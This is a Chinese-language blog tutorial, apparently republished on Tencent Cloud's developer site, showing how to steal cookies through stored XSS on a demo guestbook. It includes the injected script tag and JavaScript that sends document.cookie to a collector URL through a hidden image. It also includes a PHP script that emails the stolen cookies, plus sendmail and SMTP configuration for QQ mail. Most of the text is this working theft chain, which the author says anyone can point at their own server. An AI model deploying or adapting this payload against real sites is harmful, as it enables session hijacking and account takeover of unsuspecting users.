XSS获取cookie并发送自己邮箱
关于XSS获取cookie并发送到自己邮箱,这里我用自己做的简易留言板做个示范
注意:本教程仅供学习交流
利用别人的cookie,他们可以冒充真实的用户,在颁发cookie的那个网站中为所欲为,个人隐私在他们面前根本不存...
这是登录界面,输入用户名和密码登录后
可以对留言内容进行XSS尝试,没有作任何过滤,所以存在XSS的,这里不详细演示了,只看怎么获取cookie吧
<script>alert(document.cookie)</script>
这里可以看出cookie已经出来了,我们现在就是想别人登录时能够获取到别人的cookie
然后我自己写了个小脚本,用来获取别人的cookie
同样的方法插入xss代码,如果别人登录将会把别人的cookie发送到我邮箱里
因为是用php和js写的,所以我这里将php发送qq邮箱的方法说一下,毕竟这是困我好久的难题。
其实方法也不难,不过遇到各种各样的麻烦
需要配置sendmail,这是windows下的配置
首先,这里我用的是wamp和用php mail()函数发送的邮件,php mail()函数在windows不能用,需要安装sendmail,假如是用的XAMPP,则已经下载好,不需要重新下载 1.从http://glob.com.au/sendmail/下载sendmail.zip 2.解压到C(其他一样):下,例如C:phpsendmail,最好短路径,长路径名有可能产生问题。 3.开启SMTP服务:因为这里我用的qq发送,所以要开启qq邮箱的SMTP服务。 所有的主流邮箱都支持 SMTP 协议,但并非所有邮箱都默认开启,您可以在邮箱的设置里面手动开启。 第三方服务在提供了账号和密码之后就可以登录 SMTP 服务器,通过它来控制邮件的中转方式。 (1)开启邮箱(进入qq邮箱点设置)
点击帐户,然后开启下图服务
(2)验证密保(开启可能要验证密保)
(3)生成授权码(授权码就是下面要用的东西,忘了图一会看到有生成授权码,没必要详记)
(4)配置sendmail文件
以下都是修改项
[sendmail]
; you must change mail.mydomain.com to your smtp server
smtp_server=smtp.qq.com
smtp_port=465 //特别注意:端口这里是465,不是25,网上有很多填25,腾讯邮箱特别说明了为465
auth_username=QQ号码@qq.com
auth_password=授权码 //注意:这里是qq授权码不是邮箱密码
force_sender=QQ号码@qq.com4.配置php.ini文件 打开wamp的php.ini然后搜索
“[mail function]”,找到下面文本块,修改以下三样
[mail function]
; For Win32 only.
SMTP = smtp.qq.com //因为是qq邮箱
smtp_port = 25
; For Win32 only.
sendmail_from = qq号@qq.com
; For Unix only. You may supply arguments as well (default: “sendmail -t -i”).
sendmail_path = “E:\wamp64\sendmail\sendmail.exe -t”//修改成自己的路径5.到这里就算配置完了,然后重启wamp
然后开始用自己的脚本试试了,php发送邮件的脚本很容易,然后再加上获取cookie的js脚本,就成了
<?php
$cookie = $_GET['joke'];
if(isset($_GET['joke']))
{
$to = "QQ@qq.com"; // 邮件接收者
$subject = "COOKIE"; // 邮件标题
$message = $_GET['joke']; // 邮件正文
$from = "QQ@qq.com"; // 邮件发送者
$headers = "From:" . $from; // 头部信息设置
mail($to,$subject,$message,$headers);
echo "邮件已发送";
}else
echo "邮件发送失败";
?>var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://localhost/project/1.php?joke='+encodeURIComponent(document.cookie);//这里是用本地环境测试的,可以换成自己的ip地址然后就可以用了
<script src='http://localhost/project/joke.js'></script> //joke.js是我的js文件名
将这段代码留言就可以看到cookie了,任何人登录都可以收到他cookie
上面是本地测试,大家可以自己搭建一下环境,充当一下攻击者测试一下
版权属于:Xcnte' s Blog(除特别注明外)
本文链接:https://cloud.tencent.com/developer/article/1918319
本站文章采用 知识共享署名4.0 国际许可协议 进行许可,请在转载时注明出处及本声明!
腾讯云开发者
